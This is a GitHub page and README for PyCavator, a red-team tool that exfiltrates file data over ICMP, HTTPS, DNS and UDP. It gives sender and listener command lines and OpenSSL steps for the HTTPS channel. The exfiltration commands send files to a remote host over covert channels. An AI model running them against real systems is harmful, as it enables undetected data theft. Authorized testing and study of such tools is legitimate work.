Skip to content
/ PyCavator Public

PyCavator is a Python tool that can be used to exfiltrate data over a network based on a defined protocol. It can also send and receive data using ICMP packets.

License

View license
1 star 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kryptohaker/PyCavator

BranchesTags

Repository files navigation

PyCavator

PyCavator is a versatile Python-based tool designed for authorized red teaming, penetration testing activities, and educational purposes. It provides a simple and efficient way to send and receive data through various network protocols. The tool features a sender mode for data exfiltration and a listener mode for receiving incoming data, which can be saved in chunks or as a single file. With its flexibility and ease of use, PyCavator streamlines secure data transfer during cybersecurity assessments.

Installation

PyCavator requires Python 3 to be installed. To install PyCavator, clone the repository and install the required Python modules:

git clone https://github.com/kryptohaker/PyCavator.git
cd PyCavator
pip install -r requirements.txt

Usage

ICMP

Required libraries:

  • All libraries are part of the default Python installation.

Examples:

Sender mode: exfiltrate data from a file

python pycavator-icmp.py -f input.txt -d 192.168.1.101

Listener mode: listen for incoming data and save in chunks

python pycavator-icmp.py -l -s 192.168.1.100 -w c

Listener mode: listen for incoming data and save to a single file

python pycavator-icmp.py -l -s 192.168.1.100 -w s -o output_folder

Merge mode: merge output files with part numbers in the specified range

python pycavator-icmp.py --merge -x output -a 1 -b 10 -e txt -o output_folder

HTTPS

Required libraries:

  • requests: used for sending HTTP requests
  • Flask: used for creating the web server
  • urllib3: used for disabling SSL warnings

Examples:

Sender mode: exfiltrate data from a file

python pycavator-https.py -f input.txt -d 192.168.1.101 -p 4443 -ca ca.pem -t "eyJhbGciO..._adQssw5c"

If in the target machine installation of required libraries is not possible, use pycavator-httpsender.py instead.

Listener mode: listen for incoming data and save to a single file

python pycavator-https.py -l -s 192.168.1.100 -p 4443 -pb cert.pem -pk key.pem -o /tmp -t "eyJhbGciO..._adQssw5c"

Generating a Key, CSR, and Certificate with OpenSSL

This guide explains how to use OpenSSL to generate a new private key, create a certificate signing request (CSR) with the private key, sign the CSR to create a digital certificate, and display the contents of the certificate.

Prerequisites:

  • OpenSSL installed on your system.
Steps

Generate a new private key:

openssl genrsa -out key.pem 2048

This command generates a new RSA private key with a length of 2048 bits, and saves it to a file named key.pem.

Create a CSR with the private key:

openssl req -new -key key.pem -out csr.pem

This command creates a new certificate signing request (CSR) using the private key stored in the key.pem file, and saves the CSR to a file named csr.pem.

Sign the CSR to create a digital certificate:

openssl x509 -req -days 1 -in csr.pem -signkey key.pem -out cert.pem

This command uses the private key stored in the key.pem file to sign the CSR stored in the csr.pem file, and saves the resulting digital certificate to a file named cert.pem (is the output file that contains the public key). The -days 1 option sets the validity period of the certificate to one day.

Display the contents of the certificate:

openssl x509 -text -noout -in cert.pem

This command displays the textual representation of the digital certificate stored in the cert.pem file, without the header or footer information.

Create a self-signed root certificate authority:

cp cert.pem ca.pem

This command copies the contents of the cert.pem file to a new file named ca.pem. This is often done to create a self-signed root certificate authority (CA), which can be used to sign other certificates for internal use.

DNS

Required libraries:

  • dnspython

Examples:

Sender mode: exfiltrate data from a file:

  python pycavator-dns.py -f input.txt -s 192.168.1.101 -p 53 -d example.com -i 1

Listener mode: listen for incoming data and save to a single file:

  python pycavator-dns.py -l -s 192.168.1.101 -p 53 -o /tmp

Note: Once file has been sent, use CTRL+C in listener mode to exit and save.

UDP

Examples:

Sender mode: exfiltrate data from a file:

python pycavator-udp.py -f input.txt -s 192.168.1.101 -p 53 -i 1

Listener mode: listen for incoming data and save to a single file:

python pycavator-udp.py -l -s 192.168.1.101 -p 53 -o /tmp

How to Contribute

If you would like to contribute to PyCavator, please fork the repository and submit a pull request.

Disclaimer

This tool is intended for authorized/legitimate red teaming and pentesting activities or educational purposes only. The author of the tool is not responsible for any misuse or illegal activities that may arise from the use of this tool. Users are responsible for complying with all applicable laws and regulations. By using this tool, you acknowledge that you have read this disclaimer and agree to its terms.

License

This project is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License. This means that you are free to share and distribute the original work with proper attribution to the original author, but you may not use it for commercial purposes. Additionally, any new versions of the work must be distributed under the same license and with proper attribution to the original author. See the LICENSE file for details.

About

PyCavator is a Python tool that can be used to exfiltrate data over a network based on a defined protocol. It can also send and receive data using ICMP packets.

Resources

Readme

License

View license
Activity

Stars

1 star

Watchers

1 watching

Forks

3 forks
Report repository

Releases 2

PyCavator_1.2.0 Latest
Mar 23, 2023
+ 1 release

Packages

No packages published

Languages